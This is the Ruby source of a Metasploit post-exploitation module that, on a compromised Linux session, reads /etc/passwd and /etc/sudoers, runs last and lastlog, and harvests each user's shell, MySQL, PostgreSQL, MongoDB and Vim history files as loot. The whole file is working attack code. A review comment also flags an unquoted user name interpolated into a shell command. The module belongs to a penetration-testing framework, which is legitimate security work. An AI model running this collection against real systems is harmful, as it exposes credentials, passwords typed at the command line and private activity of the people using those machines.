Path: blob/master/modules/post/linux/gather/enum_users_history.rb
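##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-exploitation gatherer for per-user history artefacts on Linux.
#
# Every collection step goes through #execute or #cat_file, both of which
# log the command or path in verbose mode, so running with VERBOSE gives
# a complete record of what was touched on the target session.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  # Shells whose ~/.<shell>_history file is collected for each user.
  SHELLS = %w[ash bash csh ksh sh tcsh zsh].freeze

  # Marker that a file read returned instead of content when the path does
  # not exist (presumably the shell's own error text — depends on the
  # session type backing read_file); such results are not stored.
  MISSING_FILE = /No such file or directory/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather User History',
        'Description' => %q{
          This module gathers the following user-specific information:
          shell history, MySQL history, PostgreSQL history, MongoDB history,
          Vim history, lastlog, and sudoers.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          # based largely on get_bash_history function by Stephen Haywood
          'ohdae <bindshell[at]live.com>'
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter']
      )
    )
  end

  # Entry point: prints basic system information, walks the user list
  # collecting each history artefact, then stores login records and the
  # sudoers file.
  def run
    distro = get_sysinfo

    print_good('Info:')
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    current_user = execute('/usr/bin/whoami')
    users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
    # Other accounts are only enumerated when the session is root; a
    # non-root session (or an unreadable passwd) collects the current
    # user alone.
    users = [current_user] if current_user != 'root' || users.blank?

    vprint_status("Retrieving history for #{users.length} users")
    users.each do |name|
      home = get_home_dir(name)
      SHELLS.each { |shell| get_shell_history(name, home, shell) }
      get_mysql_history(name, home)
      get_psql_history(name, home)
      get_mongodb_history(name, home)
      get_vim_history(name, home)
    end

    last = execute('/usr/bin/last && /usr/bin/lastlog')
    sudoers = cat_file('/etc/sudoers')
    save('Last logs', last) unless last.blank?
    save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
  end

  # Stores collected data as loot and reports where it was written.
  #
  # @param msg [String] human-readable label, also recorded as the loot name
  # @param data [String] content to store
  # @param ctype [String] MIME type recorded with the loot
  def save(msg, data, ctype = 'text/plain')
    loot = store_loot('linux.enum.users', ctype, session, data, nil, msg)
    print_good("#{msg} stored in #{loot}")
  end

  # Runs a command in the session and returns its output, logging the
  # command first so verbose output records exactly what was run.
  #
  # @param cmd [String] command line passed to cmd_exec
  # @return [String] command output as returned by cmd_exec
  def execute(cmd)
    vprint_status("Execute: #{cmd}")
    cmd_exec(cmd)
  end

  # Reads a file from the target, logging the path in verbose mode.
  #
  # @param filename [String] absolute path on the target
  # @return [String] file contents as returned by read_file
  def cat_file(filename)
    # Log the actual path (the previous message did not interpolate it).
    vprint_status("Download: #{filename}")
    read_file(filename)
  end

  # Resolves a user's home directory via shell tilde expansion, falling
  # back to the conventional location when the shell returns nothing.
  #
  # @param user [String] account name taken from /etc/passwd
  # @return [String] home directory path
  def get_home_dir(user)
    # NOTE(review): user is interpolated unquoted into a shell command; a
    # passwd entry containing shell metacharacters would alter what runs —
    # consider validating the name before use.
    home = execute("echo ~#{user}")
    return home unless home.empty?

    user == 'root' ? '/root' : "/home/#{user}"
  end

  # Collects ~/.<shell>_history for one user and shell.
  def get_shell_history(user, home, shell)
    vprint_status("Extracting #{shell} history for #{user}")
    save_history("#{shell} history for #{user}", "#{home}/.#{shell}_history")
  end

  # Collects the MySQL client history (~/.mysql_history).
  def get_mysql_history(user, home)
    vprint_status("Extracting MySQL history for #{user}")
    save_history("MySQL history for #{user}", "#{home}/.mysql_history")
  end

  # Collects the PostgreSQL client history (~/.psql_history).
  def get_psql_history(user, home)
    vprint_status("Extracting PostgreSQL history for #{user}")
    save_history("PostgreSQL history for #{user}", "#{home}/.psql_history")
  end

  # Collects the MongoDB shell history (~/.dbshell).
  def get_mongodb_history(user, home)
    vprint_status("Extracting MongoDB history for #{user}")
    save_history("MongoDB history for #{user}", "#{home}/.dbshell")
  end

  # Collects Vim's ~/.viminfo, which records command and search history.
  def get_vim_history(user, home)
    vprint_status("Extracting Vim history for #{user}")
    save_history("Vim history for #{user}", "#{home}/.viminfo")
  end

  private

  # Reads `path` from the target and stores it as loot under `label`
  # unless the result is empty or reports a missing file. Shared by all
  # get_*_history methods so the skip rule lives in one place.
  #
  # @param label [String] loot name passed to #save
  # @param path [String] absolute path of the history file
  def save_history(label, path)
    hist = cat_file(path)
    return if hist.blank? || hist =~ MISSING_FILE

    save(label, hist)
  end
end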